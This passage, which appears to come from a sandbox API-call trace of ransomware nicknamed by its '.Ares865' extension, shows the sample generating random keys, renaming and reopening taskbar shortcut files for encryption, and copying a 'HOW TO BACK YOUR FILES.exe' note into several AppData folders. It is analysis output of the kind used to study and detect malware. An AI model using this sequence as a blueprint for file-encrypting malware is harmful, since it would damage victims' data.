halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.576] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=412) returned 1 [0108.576] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f01e8) returned 1 [0108.577] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.577] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0108.578] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f01e8) returned 1 [0108.579] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.579] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0108.580] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Google Chrome.lnk.Ares865") returned 133 [0108.580] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Google Chrome.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\google chrome.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Google Chrome.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\google chrome.lnk.ares865"), dwFlags=0x1) returned 1 [0108.582] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Google Chrome.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\google chrome.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.582] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2269) returned 1 [0108.583] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f01e8) returned 1 [0108.583] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.583] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0108.584] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f01e8) returned 1 [0108.584] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.584] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0108.593] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk.Ares865") returned 141 [0108.593] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer (2).lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer (2).lnk.ares865"), dwFlags=0x1) returned 1 [0108.596] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer (2).lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.596] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1453) returned 1 [0108.597] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f01e8) returned 1 [0108.598] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.598] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0108.598] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f01e8) returned 1 [0108.599] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.599] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0108.600] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk.Ares865") returned 137 [0108.600] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk.ares865"), dwFlags=0x1) returned 1 [0108.603] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.603] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1449) returned 1 [0108.603] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f01e8) returned 1 [0108.604] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.604] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0108.606] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f01e8) returned 1 [0108.607] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.607] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0108.607] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk.Ares865") returned 135 [0108.607] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\mozilla firefox.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\mozilla firefox.lnk.ares865"), dwFlags=0x1) returned 1 [0108.609] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\mozilla firefox.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.610] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1169) returned 1 [0108.610] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f01e8) returned 1 [0108.611] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.611] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0108.611] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f01e8) returned 1 [0108.612] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.612] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0108.613] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk.Ares865") returned 140 [0108.613] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer (2).lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer (2).lnk.ares865"), dwFlags=0x1) returned 1 [0108.615] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer (2).lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.615] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1228) returned 1 [0108.616] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f01e8) returned 1 [0108.616] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.616] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0108.617] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f01e8) returned 1 [0108.618] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.618] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0108.620] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk.Ares865") returned 136 [0108.620] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk.ares865"), dwFlags=0x1) returned 1 [0108.622] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.622] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1228) returned 1 [0108.622] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f01e8) returned 1 [0108.623] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.623] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0108.625] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f01e8) returned 1 [0108.626] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.626] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0108.626] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk.Ares865") returned 144 [0108.627] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player (2).lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player (2).lnk.ares865"), dwFlags=0x1) returned 1 [0108.628] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player (2).lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player (2).lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.629] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1547) returned 1 [0108.629] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f01e8) returned 1 [0108.630] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.630] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0108.630] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f01e8) returned 1 [0108.631] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.631] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0108.632] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk.Ares865") returned 140 [0108.632] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk.ares865"), dwFlags=0x1) returned 1 [0108.634] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.635] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1547) returned 1 [0108.635] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f01e8) returned 1 [0108.636] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.636] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0108.638] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f01e8) returned 1 [0108.639] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.639] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0108.639] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts" [0108.639] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0108.639] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0108.639] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned 120 [0108.639] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts" [0108.640] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.640] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.640] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.641] GetLastError () returned 0x0 [0108.641] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\IMJP9_0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\IMJP9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\IMJP9_0" [0108.641] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0108.641] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0108.641] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\IMJP9_0") returned 64 [0108.641] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\IMJP9_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\IMJP9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\IMJP9_0" [0108.641] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.641] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\IMJP9_0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\imjp9_0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.642] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.642] GetLastError () returned 0x0 [0108.642] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\IMJP8_1", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\IMJP8_1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\IMJP8_1" [0108.642] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0108.642] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0108.642] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\IMJP8_1") returned 64 [0108.642] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\IMJP8_1" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\IMJP8_1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\IMJP8_1" [0108.642] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0108.643] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\IMJP8_1\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\microsoft\\imjp8_1\\how to back your files.exe"), bFailIfExists=1) returned 0 [0108.643] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0108.643] GetLastError () returned 0x0 [0108.644] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\IMJP12", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\IMJP12") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Microsoft\\IMJP12" [0108.644] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0108.644] HeapFree (in: 